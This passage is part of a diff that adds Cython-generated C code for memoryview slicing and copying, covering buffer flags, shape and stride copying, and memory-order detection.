<<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + __pyx_t_1 = ((((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1028 + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + * result.flags = PyBUF_RECORDS # <<<<<<<<<<<<<< + * else: + * result.flags = PyBUF_RECORDS_RO + */ + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS; + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1030 + * result.flags = PyBUF_RECORDS + * else: + * result.flags = PyBUF_RECORDS_RO # <<<<<<<<<<<<<< + * + * result.view.shape = result.from_slice.shape + */ + /*else*/ { + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS_RO; + } + __pyx_L4:; + + /* "View.MemoryView":1032 + * result.flags = PyBUF_RECORDS_RO + * + * result.view.shape = result.from_slice.shape # <<<<<<<<<<<<<< + * result.view.strides = result.from_slice.strides + * + */ + __pyx_v_result->__pyx_base.view.shape = ((Py_ssize_t *)__pyx_v_result->from_slice.shape); + + /* "View.MemoryView":1033 + * + * result.view.shape = result.from_slice.shape + * result.view.strides = result.from_slice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_result->__pyx_base.view.strides = ((Py_ssize_t *)__pyx_v_result->from_slice.strides); + + /* "View.MemoryView":1036 + * + * + * result.view.suboffsets = NULL # <<<<<<<<<<<<<< + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + */ + __pyx_v_result->__pyx_base.view.suboffsets = NULL; + + /* "View.MemoryView":1037 + * + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + */ + __pyx_t_7 = (__pyx_v_result->from_slice.suboffsets + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->from_slice.suboffsets; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_v_suboffset = (__pyx_t_6[0]); + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + __pyx_t_1 = (__pyx_v_suboffset >= 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1039 + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_result->__pyx_base.view.suboffsets = ((Py_ssize_t *)__pyx_v_result->from_slice.suboffsets); + + /* "View.MemoryView":1040 + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + * break # <<<<<<<<<<<<<< + * + * result.view.len = result.view.itemsize + */ + goto __pyx_L6_break; + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + } + } + __pyx_L6_break:; + + /* "View.MemoryView":1042 + * break + * + * result.view.len = result.view.itemsize # <<<<<<<<<<<<<< + * for length in result.view.shape[:ndim]: + * result.view.len *= length + */ + __pyx_t_9 = __pyx_v_result->__pyx_base.view.itemsize; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + + /* "View.MemoryView":1043 + * + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: # <<<<<<<<<<<<<< + * result.view.len *= length + * + */ + __pyx_t_7 = (__pyx_v_result->__pyx_base.view.shape + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->__pyx_base.view.shape; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6[0])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1043, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1044 + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: + * result.view.len *= length # <<<<<<<<<<<<<< + * + * result.to_object_func = to_object_func + */ + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_result->__pyx_base.view.len); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_InPlaceMultiply(__pyx_t_2, __pyx_v_length); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_3); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + } + + /* "View.MemoryView":1046 + * result.view.len *= length + * + * result.to_object_func = to_object_func # <<<<<<<<<<<<<< + * result.to_dtype_func = to_dtype_func + * + */ + __pyx_v_result->to_object_func = __pyx_v_to_object_func; + + /* "View.MemoryView":1047 + * + * result.to_object_func = to_object_func + * result.to_dtype_func = to_dtype_func # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->to_dtype_func = __pyx_v_to_dtype_func; + + /* "View.MemoryView":1049 + * result.to_dtype_func = to_dtype_func + * + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_fromslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_mslice) { + struct __pyx_memoryviewslice_obj *__pyx_v_obj = 0; + __Pyx_memviewslice *__pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_slice_from_memview", 0); + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1056 + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): + * obj = memview # <<<<<<<<<<<<<< + * return &obj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 1056, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_obj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1057 + * if isinstance(memview, _memoryviewslice): + * obj = memview + * return &obj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, mslice) + */ + __pyx_r = (&__pyx_v_obj->from_slice); + goto __pyx_L0; + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + } + + /* "View.MemoryView":1059 + * return &obj.from_slice + * else: + * slice_copy(memview, mslice) # <<<<<<<<<<<<<< + * return mslice + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, __pyx_v_mslice); + + /* "View.MemoryView":1060 + * else: + * slice_copy(memview, mslice) + * return mslice # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_slice_copy') + */ + __pyx_r = __pyx_v_mslice; + goto __pyx_L0; + } + + /* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.get_slice_from_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_obj); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_dst) { + int __pyx_v_dim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + Py_ssize_t *__pyx_v_suboffsets; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + Py_ssize_t __pyx_t_5; + __Pyx_RefNannySetupContext("slice_copy", 0); + + /* "View.MemoryView":1067 + * cdef (Py_ssize_t*) shape, strides, suboffsets + * + * shape = memview.view.shape # <<<<<<<<<<<<<< + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets + */ + __pyx_t_1 = __pyx_v_memview->view.shape; + __pyx_v_shape = __pyx_t_1; + + /* "View.MemoryView":1068 + * + * shape = memview.view.shape + * strides = memview.view.strides # <<<<<<<<<<<<<< + * suboffsets = memview.view.suboffsets + * + */ + __pyx_t_1 = __pyx_v_memview->view.strides; + __pyx_v_strides = __pyx_t_1; + + /* "View.MemoryView":1069 + * shape = memview.view.shape + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets # <<<<<<<<<<<<<< + * + * dst.memview = <__pyx_memoryview *> memview + */ + __pyx_t_1 = __pyx_v_memview->view.suboffsets; + __pyx_v_suboffsets = __pyx_t_1; + + /* "View.MemoryView":1071 + * suboffsets = memview.view.suboffsets + * + * dst.memview = <__pyx_memoryview *> memview # <<<<<<<<<<<<<< + * dst.data = memview.view.buf + * + */ + __pyx_v_dst->memview = ((struct __pyx_memoryview_obj *)__pyx_v_memview); + + /* "View.MemoryView":1072 + * + * dst.memview = <__pyx_memoryview *> memview + * dst.data = memview.view.buf # <<<<<<<<<<<<<< + * + * for dim in range(memview.view.ndim): + */ + __pyx_v_dst->data = ((char *)__pyx_v_memview->view.buf); + + /* "View.MemoryView":1074 + * dst.data = memview.view.buf + * + * for dim in range(memview.view.ndim): # <<<<<<<<<<<<<< + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + */ + __pyx_t_2 = __pyx_v_memview->view.ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_dim = __pyx_t_4; + + /* "View.MemoryView":1075 + * + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] # <<<<<<<<<<<<<< + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + */ + (__pyx_v_dst->shape[__pyx_v_dim]) = (__pyx_v_shape[__pyx_v_dim]); + + /* "View.MemoryView":1076 + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] # <<<<<<<<<<<<<< + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + * + */ + (__pyx_v_dst->strides[__pyx_v_dim]) = (__pyx_v_strides[__pyx_v_dim]); + + /* "View.MemoryView":1077 + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object') + */ + if ((__pyx_v_suboffsets != 0)) { + __pyx_t_5 = (__pyx_v_suboffsets[__pyx_v_dim]); + } else { + __pyx_t_5 = -1L; + } + (__pyx_v_dst->suboffsets[__pyx_v_dim]) = __pyx_t_5; + } + + /* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *__pyx_v_memview) { + __Pyx_memviewslice __pyx_v_memviewslice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy", 0); + + /* "View.MemoryView":1083 + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) # <<<<<<<<<<<<<< + * return memoryview_copy_from_slice(memview, &memviewslice) + * + */ + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_memviewslice)); + + /* "View.MemoryView":1084 + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) + * return memoryview_copy_from_slice(memview, &memviewslice) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object_from_slice') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_memoryview_copy_object_from_slice(__pyx_v_memview, (&__pyx_v_memviewslice)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1084, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_memviewslice) { + PyObject *(*__pyx_v_to_object_func)(char *); + int (*__pyx_v_to_dtype_func)(char *, PyObject *); + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *(*__pyx_t_2)(char *); + int (*__pyx_t_3)(char *, PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy_from_slice", 0); + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1095 + * + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func # <<<<<<<<<<<<<< + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + */ + __pyx_t_2 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_object_func; + __pyx_v_to_object_func = __pyx_t_2; + + /* "View.MemoryView":1096 + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func # <<<<<<<<<<<<<< + * else: + * to_object_func = NULL + */ + __pyx_t_3 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_dtype_func; + __pyx_v_to_dtype_func = __pyx_t_3; + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1098 + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + * to_object_func = NULL # <<<<<<<<<<<<<< + * to_dtype_func = NULL + * + */ + /*else*/ { + __pyx_v_to_object_func = NULL; + + /* "View.MemoryView":1099 + * else: + * to_object_func = NULL + * to_dtype_func = NULL # <<<<<<<<<<<<<< + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + */ + __pyx_v_to_dtype_func = NULL; + } + __pyx_L3:; + + /* "View.MemoryView":1101 + * to_dtype_func = NULL + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, # <<<<<<<<<<<<<< + * to_object_func, to_dtype_func, + * memview.dtype_is_object) + */ + __Pyx_XDECREF(__pyx_r); + + /* "View.MemoryView":1103 + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + * to_object_func, to_dtype_func, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_memoryview_fromslice((__pyx_v_memviewslice[0]), __pyx_v_memview->view.ndim, __pyx_v_to_object_func, __pyx_v_to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_from_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + +static Py_ssize_t abs_py_ssize_t(Py_ssize_t __pyx_v_arg) { + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + + /* "View.MemoryView":1110 + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: + * return -arg if arg < 0 else arg # <<<<<<<<<<<<<< + * + * @cname('__pyx_get_best_slice_order') + */ + if ((__pyx_v_arg < 0)) { + __pyx_t_1 = (-__pyx_v_arg); + } else { + __pyx_t_1 = __pyx_v_arg; + } + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + +static char __pyx_get_best_slice_order(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim) { + int __pyx_v_i; + Py_ssize_t __pyx_v_c_stride; + Py_ssize_t __pyx_v_f_stride; + char __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1118 + * """ + * cdef int i + * cdef Py_ssize_t c_stride = 0 # <<<<<<<<<<<<<< + * cdef Py_ssize_t f_stride = 0 + * + */ + __pyx_v_c_stride = 0; + + /* "View.MemoryView":1119 + * cdef int i + * cdef Py_ssize_t c_stride = 0 + * cdef Py_ssize_t f_stride = 0 # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_f_stride = 0; + + /* "View.MemoryView":1121 + * cdef Py_ssize_t f_stride = 0 + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1123 + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_c_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1124 + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + goto __pyx_L4_break; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L4_break:; + + /* "View.MemoryView":1126 + * break + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + */ + __pyx_t_1 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_1; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1128 + * for i in range(ndim): + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_f_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1129 + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + */ + goto __pyx_L7_break; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L7_break:; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + __pyx_t_2 = (abs_py_ssize_t(__pyx_v_c_stride) <= abs_py_ssize_t(__pyx_v_f_stride)); + if (__pyx_t_2) { + + /* "View.MemoryView":1132 + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + * return 'C' # <<<<<<<<<<<<<< + * else: + * return 'F' + */ + __pyx_r = 'C'; + goto __pyx_L0; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + } + + /* "View.MemoryView":1134 + * return 'C' + * else: + * return 'F' # <<<<<<<<<<<<<< + * + * @cython.cdivision(True) + */ + /*else*/ { + __pyx_r = 'F'; + goto __pyx_L0; + } + + /* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + +static void _copy_strided_to_strided(char *__pyx_v_src_data, Py_ssize_t *__pyx_v_src_strides, char *__pyx_v_dst_data, Py_ssize_t *__pyx_v_dst_strides, Py_ssize_t *__pyx_v_src_shape, Py_ssize_t *__pyx_v_dst_shape, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + CYTHON_UNUSED Py_ssize_t __pyx_v_src_extent; + Py_ssize_t __pyx_v_dst_extent; + Py_ssize_t __pyx_v_src_stride; + Py_ssize_t __pyx_v_dst_stride; + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + + /* "View.MemoryView":1144 + * + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + */ + __pyx_v_src_extent = (__pyx_v_src_shape[0]); + + /* "View.MemoryView":1145 + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] + */ + __pyx_v_dst_extent = (__pyx_v_dst_shape[0]); + + /* "View.MemoryView":1146 + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + */ + __pyx_v_src_stride = (__pyx_v_src_strides[0]); + + /* "View.MemoryView":1147 + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_dst_stride = (__pyx_v_dst_strides[0]); + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + __pyx_t_2 = (__pyx_v_src_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_dst_stride > 0); 